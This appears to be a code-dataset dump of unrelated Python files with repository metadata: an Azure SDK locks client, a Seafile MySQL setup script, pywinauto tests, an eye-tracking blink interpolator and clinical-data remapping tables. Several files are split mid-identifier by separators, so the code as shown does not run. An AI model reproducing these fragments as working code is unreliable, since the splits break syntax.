for dev in adbutils.adb.device_list():
print("Dev:", dev)
d = u2.connect(dev.serial)
t = threading.Thread(target=worker, args=(d,))
t.start()
|
Azure/azure-sdk-for-python
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/locks/v2016_09_01/aio/operations/_management_locks_operations.py
|
Python
|
mit
| 49,288 | 0.005011 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._management_locks_operations import build_create_or_update_at_resource_group_level_request, build_create_or_update_at_resource_level_request, build_create_or_update_at_subscription_level_request, build_create_or_update_by_scope_request, build_delete_at_resource_group_level_request, build_delete_at_resource_level_request, build_delete_at_subscription_level_request, build_delete_by_scope_request, build_get_at_resource_group_level_request, build_get_at_resource_level_request, build_get_at_subscription_level_request, build_get_by_scope_request, build_list_at_resource_group_level_request, build_list_at_resource_level_request, build_list_at_subscription_level_request, build_list_by_scope_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ManagementLocksOperations:
"""ManagementLocksOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.resource.locks.v2016_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def create_or_update_at_resource_group_level(
self,
resource_group_name: str,
lock_name: str,
parameters: "_models.ManagementLockObject",
**kwargs: Any
) -> "_models.ManagementLockObject":
"""Creates or updates a management lock at the resource group level.
When you apply a lock at a parent scope, all child resources inherit the same lock. To create
management locks, you must have access to Microsoft.Authorization/\ * or
Microsoft.Authorization/locks/* actions. Of the built-in roles, only Owner and User Access
Administrator are granted those actions.
:param resource_group_name: The name of the resource group to lock.
:type resource_group_name: str
:param lock_name: The lock name. The lock name can be a maximum of 260 characters. It cannot
contain <, > %, &, :, \, ?, /, or any control characters.
:type lock_name: str
:param parameters: The management lock parameters.
:type parameters: ~azure.mgmt.resource.locks.v2016_09_01.models.ManagementLockObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagementLockObject, or the result of cls(response)
:rtype: ~azure.mgmt.resource.locks.v2016_09_01.models.ManagementLockObject
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagementLockObject"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ManagementLockObject')
request = build_create_or_update_at_resource_group_level_request(
resource_group_name=resource_group_name,
lock_name=lock_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update_at_resource_group_level.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ManagementLockObject', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ManagementLockObject', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deseri
|
alized
create_or_update_at_resource_group_level.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Authorization/locks/{lockName}'} # type: ignore
@distributed_trace_async
async def delete_at_resource_group_level(
self,
resource_group_name
|
: str,
lock_name: str,
**kwargs: Any
) -> None:
"""Deletes a management lock at the resource group level.
To delete management locks, you must have access to Microsoft.Authorization/\ * or
Microsoft.Authorization/locks/* actions. Of the built-in roles, only Owner and User Access
Administrator are granted those actions.
:param resource_group_name: The name of the resource group containing the lock.
:type resource_group_name: str
:param lock_name: The name of lock to delete.
:type lock_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_at_resource_group_level_request(
resource_group_name=resource_group_name,
lock_name=lock_name,
subscription_id=self._config.subscription_id,
template_url=self.delete_at_resource_group_level.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
|
Chilledheart/seafile
|
scripts/setup-seafile-mysql.py
|
Python
|
gpl-3.0
| 43,261 | 0.002104 |
#coding: UTF-8
'''This script would guide the seafile admin to setup seafile with MySQL'''
import sys
import os
import time
import re
import shutil
import glob
import subprocess
import hashlib
import getpass
import uuid
import warnings
import MySQLdb
from ConfigParser import ConfigParser
try:
import readline # pylint: disable=W0611
except ImportError:
pass
SERVER_MANUAL_HTTP = 'https://github.com/haiwen/seafile/wiki'
class Utils(object):
'''Groups all helper functions here'''
@staticmethod
def welcome():
'''Show welcome message'''
welcome_msg = '''\
-----------------------------------------------------------------
This script will guide you to setup your seafile server using MySQL.
Make sure you have read seafile server manual at
%s
Press ENTER to continue
-----------------------------------------------------------------''' % SERVER_MANUAL_HTTP
print welcome_msg
raw_input()
@staticmethod
def highlight(content):
'''Add ANSI color to content to get it highlighted on terminal'''
return '\x1b[33m%s\x1b[m' % content
@staticmethod
def info(msg):
print msg
@staticmethod
def error(msg):
'''Print error and exit'''
print
print 'Error: ' + msg
sys.exit(1)
@staticmethod
def run_argv(argv, cwd=None, env=None, suppress_stdout=False, suppress_stderr=False):
'''Run a program and wait it to finish, and return its exit code. The
standard output of this program is supressed.
'''
with open(os.devnull, 'w') as devnull:
if suppress_stdout:
stdout = devnull
else:
stdout = sys.stdout
if suppress_stderr:
stderr = devnull
else:
stderr = sys.stderr
proc = subprocess.Popen(argv,
cwd=cwd,
stdout=stdout,
stderr=stderr,
env=env)
return proc.wait()
@staticmethod
def run(cmdline, cwd=None, env=None, suppress_stdout=False, suppress_stderr=False):
'''Like run_argv but specify a command line string instead of argv'''
with open(os.devnull, 'w') as devnull:
if suppress_stdout:
stdout = devnull
else:
stdout = sys.stdout
if suppress_stderr:
stderr = devnull
else:
stderr = sys.stderr
proc = subprocess.Popen(cmdline,
cwd=cwd,
stdout=stdout,
stderr=stderr,
env=env,
shell=True)
return proc.wait()
@staticmethod
def prepend_env_value(name, value, env=None, seperator=':'):
'''prepend a new value to a list'''
if env is None:
env = os.environ
try:
current_value = env[name]
except KeyError:
current_value = ''
new_value = value
if current_value:
new_value += seperator + current_value
env[name] = new_value
@staticmethod
def must_mkdir(path):
'''Create a directory, exit on failure'''
try:
os.mkdir(path)
except OSError, e:
Utils.error('failed to create directory %s:%s' % (path, e))
@staticmethod
def must_copy(src, dst):
'''Copy src to dst, exit on failure'''
try:
shutil.copy(src, dst)
except Exception, e:
Utils.error('failed to copy %s to %s: %s' % (src, dst, e))
@staticmethod
def find_in_path(prog):
if 'win32' in sys.platform:
sep = ';'
else:
sep = ':'
dirs = os.environ['PATH'].split(sep)
for d in dirs:
d = d.strip()
if d == '':
continue
path = os.path.join(d, prog)
if os.path.exists(path):
return path
return None
@staticmethod
def get_python_executable():
'''Return the python executable. This should be the PYTHON environment
variable which is set in setup-seafile-mysql.sh
'''
return os.environ['PYTHON']
@staticmethod
def read_config(fn):
'''Return a case sensitive ConfigParser by reading the file "fn"'''
cp = ConfigParser()
cp.optionxform = str
cp.read(fn)
return cp
@staticmethod
def write_config(cp, fn):
'''Return a case sensitive ConfigParser by reading the file "fn"'''
with open(fn, 'w') as fp:
cp.write(fp)
@staticmethod
def ask_question(desc,
key=None,
note=None,
default=None,
validate=None,
yes_or_no=False,
password=False):
'''Ask a question, return the answer.
@desc description, e.g. "What is the port of ccnet?"
@key a name to represent the target of the question, e.g. "port for
ccnet server"
@note additional information for the question, e.g. "Must be a valid
port number"
@default the default value of the question. If the default value is
not None, when the user enter nothing and press [ENTER], the default
value would be returned
@validate a function that takes the user input as the only parameter
and validate it. It should return a validated value, or throws an
"InvalidAnswer" exception if the input is not valid.
@yes_or_no If true, the user must answer "yes" or "no", and a boolean
value would be returned
@password If true, the user input would not be echoed to the
console
'''
assert key or yes_or_no
# Format description
print
if note:
desc += '\n' + note
desc += '\n'
if yes_or_no:
desc += '[ yes or no ]'
else:
if default:
desc += '[ default "%s" ]' % default
else:
desc += '[ %s ]' % key
desc += ' '
while True:
# prompt for user input
if password:
answer = getpass.getpass(desc).strip()
else:
answer = raw_input(desc).strip()
# No user input: use default
if not answer:
if default:
answer = default
else:
continue
# Have user input: validate answer
if yes_or_no:
if answer not in ['yes', 'no']:
print Utils.highlight('\nPlease answer yes or no\n')
continue
else:
return answer == 'yes'
else:
if validate:
try:
return validate(answer)
except InvalidAnswer, e:
print Utils.highlight('\n%s\n' % e)
continue
else:
return answer
@staticmethod
def validate_port(port):
try:
port = int(port)
except ValueError:
raise InvalidAnswer('%s is not a valid port' % Utils.highlight(port))
if port <= 0 or port > 65535:
raise InvalidAnswer('%s is not a valid port' % Utils.highlight(port))
return port
class Invalid
|
Answer(Exception):
def __init__(self, msg):
Exception.__init__(self)
self.msg = msg
def __str__(self):
return self.msg
### END of Utils
####################
class EnvM
|
anager(object):
'''System environment and directory layout'''
def __init__(self):
self.install_path = os.path.dirname(os.path.abspath(__file__))
self.top_dir = os.path.dirname(self.install_path)
self.
|
acs-um/deptos
|
deptos/departamentos/urls.py
|
Python
|
apache-2.0
| 209 | 0.004785 |
from django.conf.urls import include, url
from .view
|
s import alquiler_nuevo, home
from django.contrib.auth.decora
|
tors import login_required
from departamentos.views import home, details
urlpatterns = [
]
|
airelil/pywinauto
|
pywinauto/unittests/test_uiawrapper.py
|
Python
|
bsd-3-clause
| 89,050 | 0.002223 |
"""Tests for UIAWrapper"""
from __future__ import print_function
from __future__ import unicode_literals
import time
import os
import sys
import unittest
import mock
import six
sys.path.append(".")
from pywinauto.application import Application, WindowSpecification # noqa: E402
from pywinauto.sysinfo import is_x64_Python, UIA_support # noqa: E402
from pywinauto.timings import Timings # noqa: E402
from pywinauto.actionlogger import ActionLogger # noqa: E402
from pywinauto import Desktop
from pywinauto import mouse # noqa: E402
if UIA_support:
import comtypes
import pywinauto.uia_defines as uia_defs
import pywinauto.controls.uia_controls as uia_ctls
wpf_samples_folder = os.path.join(
os.path.dirname(__file__), r"..\..\apps\WPF_samples")
if is_x64_Python():
wpf_samples_folder = os.path.join(wpf_samples_folder, 'x64')
wpf_app_1 = os.path.join(wpf_samples_folder, u"WpfApplication1.exe")
mfc_samples_folder = os.path.join(
os.path.dirname(__file__), r"..\..\apps\MFC_samples")
if is_x64_Python():
mfc_samples_folder = os.path.join(mfc_samples_folder, 'x64')
mfc_app_rebar_test = os.path.join(mfc_samples_folder, u"RebarTest.exe")
winforms_folder = os.path.join(
os.path.dirname(__file__), r"..\..\apps\WinForms_samples")
if is_x64_Python():
winforms_folder = os.path.join(winforms_folder, 'x64')
winfoms_app_grid = os.path.join(winforms_folder, u"DataGridView_TestApp.exe")
if UIA_support:
def _set_timings():
"""Setup timings for UIA related tests"""
Timings.defaults()
Timings.window_find_timeout = 20
|
class UIAWrapperTests(unittest.TestCase):
"""Unit tests for the UIAWrapper class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
_set_timings()
mouse.move((-500, 500)) # remove the mouse from the screen to avoid side effects
# start the application
self.app = Application(backend='uia')
self.app = self.app.start(wp
|
f_app_1)
self.dlg = self.app.WPFSampleApplication
def tearDown(self):
"""Close the application after tests"""
self.app.kill()
def test_issue_296(self):
"""Test handling of disappered descendants"""
wrp = self.dlg.wrapper_object()
orig = wrp.element_info._element.FindAll
wrp.element_info._element.FindAll = mock.Mock(side_effect=ValueError("Mocked value error"),
return_value=[]) # empty list
self.assertEqual([], wrp.descendants())
exception_err = comtypes.COMError(-2147220991, "Mocked COM error", ())
wrp.element_info._element.FindAll = mock.Mock(side_effect=exception_err,
return_value=[]) # empty list
self.assertEqual([], wrp.descendants())
wrp.element_info._element.FindAll = orig # restore the original method
def test_issue_278(self):
"""Test that statement menu = app.MainWindow.Menu works for 'uia' backend"""
menu_spec = self.dlg.Menu
self.assertTrue(isinstance(menu_spec, WindowSpecification))
def test_find_nontop_ctl_by_class_name_and_title(self):
"""Test getting a non-top control by a class name and a title"""
# Look up for a non-top button control with 'Apply' caption
self.dlg.wait('ready')
caption = 'Apply'
wins = self.app.windows(top_level_only=False,
class_name='Button',
title=caption)
# Verify the number of found wrappers
self.assertEqual(len(wins), 1)
# Verify the caption of the found wrapper
self.assertEqual(wins[0].texts()[0], caption)
def test_find_top_win_by_class_name_and_title(self):
"""Test getting a top window by a class name and a title"""
# Since the top_level_only is True by default
# we don't specify it as a criteria argument
self.dlg.wait('ready')
caption = 'WPF Sample Application'
wins = self.app.windows(class_name='Window', title=caption)
# Verify the number of found wrappers
self.assertEqual(len(wins), 1)
# Verify the caption of the found wrapper
self.assertEqual(wins[0].texts()[0], caption)
def test_class(self):
"""Test getting the classname of the dialog"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.class_name(), "Button")
def test_window_text(self):
"""Test getting the window Text of the dialog"""
label = self.dlg.TestLabel.wrapper_object()
self.assertEqual(label.window_text(), u"TestLabel")
self.assertEqual(label.can_be_label, True)
def test_control_id(self):
"""Test getting control ID"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.control_id(), None)
def test_runtime_id(self):
"""Test getting runtime ID"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertNotEqual(button.__hash__(), 0)
orig = button.element_info._element.GetRuntimeId
exception_err = comtypes.COMError(-2147220991, 'An event was unable to invoke any of the subscribers', ())
button.element_info._element.GetRuntimeId = mock.Mock(side_effect=exception_err)
self.assertEqual(button.__hash__(), 0)
button.element_info._element.GetRuntimeId = orig # restore the original method
def test_automation_id(self):
"""Test getting automation ID"""
alpha_toolbar = self.dlg.child_window(title="Alpha", control_type="ToolBar")
button = alpha_toolbar.child_window(control_type="Button",
auto_id="OverflowButton").wrapper_object()
self.assertEqual(button.automation_id(), "OverflowButton")
def test_is_visible(self):
"""Test is_visible method of a control"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.is_visible(), True)
def test_is_enabled(self):
"""Test is_enabled method of a control"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.is_enabled(), True)
def test_process_id(self):
"""Test process_id method of a control"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.process_id(), self.dlg.process_id())
self.assertNotEqual(button.process_id(), 0)
def test_is_dialog(self):
"""Test is_dialog method of a control"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.is_dialog(), False)
def test_parent(self):
"""Test getting a parent of a control"""
button = self.dlg.Alpha.wrapper_object()
self.assertEqual(button.parent(), self.dlg.wrapper_object())
def test_top_level_parent(self):
"""Test getting a top-level parent of a control"""
button = self.dlg.child_window(class_name="Button",
title="OK").wrapper_object()
self.assertEqual(button.top_level_parent(), self.dlg.wrappe
|
esdalmaijer/PyGazeAnalyser
|
pygazeanalyser/traces.py
|
Python
|
gpl-3.0
| 19,865 | 0.037352 |
# PyeNalysis
__author__ = "Edwin Dalmaijer"
import copy
import numpy
from scipy.interpolate import interp1d
# DEBUG #
#from matplotlib import pyplot
# # # # #
def interpolate_blink(signal, mode='auto', velthresh=5, maxdur=500, margin=10, invalid=-1, edfonly=False):
"""Returns signal with interpolated results, based on a cubic or linear
interpolation of all blinks detected in the signal; based on:
https://github.com/smathot/exparser/blob/master/exparser/TraceKit.py
arguments
signal -- a vector (i.e. a NumPy array) containing a single
trace of your signal; alternatively a trial gaze data
dict as is returned by edfreader can be passed; in this
case the blink ending events will be used to find blinks
before the pupil size velocity algorithm will be used
(NOTE: this means both will be used successively!)
keyword arguments
mode -- string indicating what kind of interpolation to use:
'linear' for a linear interpolation
'cubic' for a cubic interpolation
'auto' for a cubic interpolation is possible (i.e.
when more than four data points are available)
and linear when this is not the case
(default = 'auto')
velthresh -- pupil size change velocity threshold in arbitrary
units per sample (default = 5)
maxdur -- maximal duration of the blink in samples
(default = 500)
margin -- margin (in samples) to compensate for blink duration
underestimatiom; blink is extended for detected start
minus margin, and detected end plus margin
(default = 10)
edfonly -- Boolean indicating whether blinks should ONLY be
detected using the EDF logs and NOT algorithmically
returns
signal -- a NumPy array containing the interpolated signal
"""
# # # # #
# input errors
# wrong interpolation method
if mode not in ['auto','linear','cubic']:
raise Exception("Error in pyenalysis.interpolate_missing: mode '%s' is not supported, please use one of the following: 'auto','linear','cubic'" % mode)
# wrong signal dimension
if type(signal) != dict:
if signal.ndim != 1:
raise Exception("Error in pyenalysis.interpolate_missing: input is not a single signal trace, but has %d dimensions; please provide a 1-dimension array" % signal.ndim)
# # # # #
# find blinks
# empty lists, to store blink starts and endings
starts = []
ends = []
# edfreader data
if type(signal) == dict:
# loop through blinks
for st, et, dur in signal['events']['Eblk']: # Eblk - list of lists, each containing [starttime, endtime, duration]
# edf time to sample number
st = numpy.where(signal['edftime']==st)[0]
et = numpy.where(
|
signal['edftime']==et)[0]
# if th
|
e starting or ending time did not appear in the trial,
# correct the blink starting or ending point to the first or
# last sample, respectively
if len(st) == 0:
st = 0
else:
st = st[0]
if len(et) == 0:
et = len(signal['edftime'])
else:
et = et[0]
# compensate for underestimation of blink duration
if st-margin >= 0:
st -= margin
if et+margin < len(signal['size']):
et += margin
# do not except blinks that exceed maximal blink duration
if et-st <= maxdur:
# append start time and ending time
starts.append(st)
ends.append(et)
# extract pupil size data from signal
signal = signal['size']
if not edfonly:
# signal in NumPy array
# create a velocity profile of the signal
vprof = signal[1:]-signal[:-1]
# start detection
ifrom = 0
while True:
# blink onset is detected when pupil size change velocity exceeds
# threshold
l = numpy.where(vprof[ifrom:] < -velthresh)[0]
# break when no blink start is detected
if len(l) == 0:
break
# blink start index
istart = l[0]+ifrom
if ifrom == istart:
break
# reversal (opening of the eye) is detected when pupil size
# starts to increase with a super-threshold velocity
l = numpy.where(vprof[istart:] > velthresh)[0]
# if no reversal is detected, start detection process at istart
# next run
if len(l) == 0:
ifrom = istart
# reloop
continue
# index number of somewhat halfway blink process
imid = l[0] + istart
# a blink ending is detected when pupil size increase velocity
# falls back to zero
l = numpy.where(vprof[imid:] < 0)[0]
# if no ending is detected, start detection process from imid
# next run
if len(l) == 0:
ifrom = imid
# reloop
continue
# blink end index
iend = l[0]+imid
# start detection process from current blink ending next run
ifrom = iend
# compensate for underestimation of blink duration
if istart-margin >= 0:
istart -= margin
if iend+margin < len(signal):
iend += margin
# do not except blinks that exceed maximal blink duration
if iend-istart > maxdur:
# reloop
continue
# if all is well, we append start and ending to their respective
# lists
starts.append(istart)
ends.append(iend)
# # DEBUG #
# pyplot.figure()
# pyplot.title("" % ())
# pyplot.plot(signal,'ko')
# pyplot.plot(vprof,'b')
# # # # # #
# # # # #
# interpolate
# loop through all starting and ending positions
for i in range(len(starts)):
# empty list to store data points for interpolation
pl = []
# duration in samples
duration = ends[i]-starts[i]
# starting point
if starts[i] - duration >= 0:
pl.extend([starts[i]-duration])
# central points (data between these points will be replaced)
pl.extend([starts[i],ends[i]])
# ending point
if ends[i] + duration < len(signal):
pl.extend([ends[i]+duration])
# choose interpolation type
if mode == 'auto':
# if our range is wide enough, we can interpolate cubicly
if len(pl) >= 4:
kind = 'cubic'
# if not, we use a linear interpolation
else:
kind = 'linear'
else:
kind = mode[:]
# select values for interpolation function
x = numpy.array(pl)
y = signal[x]
# replace any invalid values with trial average
y[y==invalid] = numpy.mean(signal[signal!=invalid])
# create interpolation function
intfunc = interp1d(x,y,kind=kind)
# do interpolation
xint = numpy.arange(starts[i],ends[i])
yint = intfunc(xint)
# insert interpolated values into signal
signal[xint] = yint
# # DEBUG #
# y = numpy.zeros(len(pl)) + max(signal)
# pyplot.plot(pl,y,'ro')
# pyplot.plot(signal,'r')
# # # # # #
return signal
def interpolate_missing(signal, mode='auto', mindur=5, margin=10, invalid=-1):
"""Returns signal with interpolated results, based on a cubic or linear
interpolation of the invalid data in the signal
arguments
signal -- a vector (i.e. a NumPy array) containing a single
trace of your signal
keyword arguments
mode -- string indicating what kind of interpolation to use:
'linear' for a linear interpolation
'cubic' for a cubic interpolation
'auto' for a cubic interpolation is possible (i.e.
when more than four data points are available)
and linear when this is not the case
(default = 'auto')
mindur -- minimal amount of consecutive samples to interpolate
cubically; otherwise a linear interpolation is used;
this is to prevent weird results in the interpolation
of very short strings of missing data (default = 5)
margin -- margin (in samples) to compensate for missing duration
underestimatiom; missing is extended for detected start
minus margin, and detected end plus margin; this helps
in reducing errors in blink interpolation that has not
been done by interpolate_blink (default = 10)
invalid -- a single value coding for invalid data, e.g. -1 or 0.0
(default = -1)
returns
signal -- a NumPy array containing the interpolated signal
"""
# # # # #
# input errors
# wrong interpolation method
if mode not in ['auto','linear','cubic']:
raise Exception("Error in pyenalysis.interpolate_missing: mode '%s' is not supported, please use one of the following: 'auto','linear','cubic'" % mode)
# wrong signal dimension
if signal.ndim != 1:
raise Exception("Error in pyenalysis.interpolate_missing: input is not a single signal trace, but has %d dimensions; please provide a 1-dimension
|
cancerregulome/gidget
|
commands/feature_matrix_construction/main/cleanClinTSV.py
|
Python
|
mit
| 98,495 | 0.004041 |
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
import miscClin
import tsvIO
import sys
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
remapDict = {}
DAYS_PER_YEAR = 365.2425
# ------------------------------------------------------------------------- ##
# DEPENDING ON WHICH TUMOR TYPE IS BEING PROCESSED, THESE SWITCHES MAY
# NEED TO BE CHANGED ...
remapDict["anatomic_organ_subdivision"] = {}
if (1):
remapDict["anatomic_organ_subdivision"]["na"] = "NA"
remapDict["anatomic_organ_subdivision"]["rectum"] = 0
remapDict["anatomic_organ_subdivision"]["rectosigmoid_junction"] = 1
remapDict["anatomic_organ_subdivision"]["sigmoid_colon"] = 2
remapDict["anatomic_organ_subdivision"]["descending_colon"] = 3
remapDict["anatomic_organ_subdivision"]["splenic_flexure"] = 4
remapDict["anatomic_organ_subdivision"]["transverse_colon"] = 5
remapDict["anatomic_organ_subdivision"]["hepatic_flexure"] = 6
remapDict["anatomic_organ_subdivision"]["ascending_colon"] = 7
remapDict["anatomic_organ_subdivision"]["cecum"] = 8
if (0):
remapDict["anatomic_organ_subdivision"]["na"] = "NA"
remapDict["anatomic_organ_subdivision"]["bilateral"] = "bilateral"
remapDict["anatomic_organ_subdivision"]["left"] = "left"
remapDict["anatomic_organ_subdivision"]["right"] = "right"
if (0):
remapDict["anatomic_organ_subdivision"][""] = "NA"
remapDict["anatomic_organ_subdivision"]["na"] = "NA"
remapDict["anatomic_organ_subdivision"]["brain"] = "brain"
remapDict["histological_type"] = {}
if (0):
remapDict["histological_type"
|
]["na"] = "NA"
remapDict["histological_type"]["colon_adenocarcinoma"] = 0
remapDict["histological_type"]["rectal_adenocarcin
|
oma"] = 0
remapDict["histological_type"]["colon_mucinous_adenocarcinoma"] = 1
remapDict["histological_type"]["rectal_mucinous_adenocarcinoma"] = 1
if (0):
remapDict["histological_type"]["na"] = "NA"
remapDict["histological_type"][
"untreated_primary_(de_novo)_gbm"] = "de_novo"
remapDict["histological_type"]["treated_primary_gbm"] = "primary"
remapDict["ethnicity"] = {}
remapDict["ethnicity"]["hispanic_or_latino"] = "hispanic"
remapDict["ethnicity"]["not_hispanic_or_latino"] = "not_hispanic"
# ------------------------------------------------------------------------- ##
remapDict["tumor_grade"] = {}
remapDict["tumor_grade"]["na"] = "NA"
remapDict["tumor_grade"]["gx"] = "NA"
remapDict["tumor_grade"]["gb"] = "NA"
remapDict["tumor_grade"]["g1"] = 1
remapDict["tumor_grade"]["g2"] = 2
remapDict["tumor_grade"]["g3"] = 3
remapDict["tumor_grade"]["g4"] = 4
remapDict["tumor_grade"]["high grade"] = 3 # ???
remapDict["tumor_grade"]["high_grade"] = 3 # ???
if (0):
remapDict["tumor_stage"] = {}
remapDict["tumor_stage"]["na"] = "NA"
remapDict["tumor_stage"]["i"] = 1
remapDict["tumor_stage"]["ia"] = 1.2
remapDict["tumor_stage"]["ib"] = 1.4
remapDict["tumor_stage"]["ic"] = 1.6
remapDict["tumor_stage"]["ii"] = 2
remapDict["tumor_stage"]["iia"] = 2.2
remapDict["tumor_stage"]["iib"] = 2.4
remapDict["tumor_stage"]["iic"] = 2.6
remapDict["tumor_stage"]["iii"] = 3
remapDict["tumor_stage"]["iiia"] = 3.2
remapDict["tumor_stage"]["iiib"] = 3.4
remapDict["tumor_stage"]["iiic"] = 3.6
remapDict["tumor_stage"]["iv"] = 4
remapDict["tumor_stage"]["iva"] = 4.2
remapDict["tumor_stage"]["ivb"] = 4.4
remapDict["tumor_stage"]["ivc"] = 4.6
remapDict["breast_tumor_pathologic_grouping_stage"] = {}
remapDict["breast_tumor_pathologic_grouping_stage"]["na"] = "NA"
remapDict["breast_tumor_pathologic_grouping_stage"]["x"] = "NA"
remapDict["breast_tumor_pathologic_grouping_stage"]["tis"] = 0.5
remapDict["breast_tumor_pathologic_grouping_stage"]["i"] = 1
remapDict["breast_tumor_pathologic_grouping_stage"]["ia"] = 1.2
remapDict["breast_tumor_pathologic_grouping_stage"]["ib"] = 1.4
remapDict["breast_tumor_pathologic_grouping_stage"]["ii"] = 2
remapDict["breast_tumor_pathologic_grouping_stage"]["iia"] = 2.2
remapDict["breast_tumor_pathologic_grouping_stage"]["iib"] = 2.4
remapDict["breast_tumor_pathologic_grouping_stage"]["iic"] = 2.6
remapDict["breast_tumor_pathologic_grouping_stage"]["iii"] = 3
remapDict["breast_tumor_pathologic_grouping_stage"]["iiia"] = 3.2
remapDict["breast_tumor_pathologic_grouping_stage"]["iiib"] = 3.4
remapDict["breast_tumor_pathologic_grouping_stage"]["iiic"] = 3.6
remapDict["breast_tumor_pathologic_grouping_stage"]["iv"] = 4
remapDict["primary_tumor_pathologic_spread"] = {}
remapDict["primary_tumor_pathologic_spread"]["na"] = "NA"
remapDict["primary_tumor_pathologic_spread"]["tx"] = "NA"
remapDict["primary_tumor_pathologic_spread"]["t0"] = 0
remapDict["primary_tumor_pathologic_spread"]["tis"] = 0.5
remapDict["primary_tumor_pathologic_spread"]["t1"] = 1
remapDict["primary_tumor_pathologic_spread"]["t1a"] = 1.2
remapDict["primary_tumor_pathologic_spread"]["t1b"] = 1.4
remapDict["primary_tumor_pathologic_spread"]["t2"] = 2
remapDict["primary_tumor_pathologic_spread"]["t2a"] = 2.2
remapDict["primary_tumor_pathologic_spread"]["t2b"] = 2.4
remapDict["primary_tumor_pathologic_spread"]["t3"] = 3
remapDict["primary_tumor_pathologic_spread"]["t3a"] = 3.2
remapDict["primary_tumor_pathologic_spread"]["t3b"] = 3.4
remapDict["primary_tumor_pathologic_spread"]["t3c"] = 3.6
remapDict["primary_tumor_pathologic_spread"]["t4"] = 4
remapDict["primary_tumor_pathologic_spread"]["t4a"] = 4.2
remapDict["primary_tumor_pathologic_spread"]["t4b"] = 4.4
remapDict["breast_tumor_pathologic_t_stage"] = {}
remapDict["breast_tumor_pathologic_t_stage"]["na"] = "NA"
remapDict["breast_tumor_pathologic_t_stage"]["tx"] = "NA"
remapDict["breast_tumor_pathologic_t_stage"]["t1"] = 1
remapDict["breast_tumor_pathologic_t_stage"]["t1a"] = 1.2
remapDict["breast_tumor_pathologic_t_stage"]["t1b"] = 1.4
remapDict["breast_tumor_pathologic_t_stage"]["t1c"] = 1.6
remapDict["breast_tumor_pathologic_t_stage"]["t2"] = 2
remapDict["breast_tumor_pathologic_t_stage"]["t2a"] = 2.2
remapDict["breast_tumor_pathologic_t_stage"]["t2b"] = 2.4
remapDict["breast_tumor_pathologic_t_stage"]["t2c"] = 2.6
remapDict["breast_tumor_pathologic_t_stage"]["t3"] = 3
remapDict["breast_tumor_pathologic_t_stage"]["t3a"] = 3.4
remapDict["breast_tumor_pathologic_t_stage"]["t3b"] = 3.4
remapDict["breast_tumor_pathologic_t_stage"]["t3c"] = 3.6
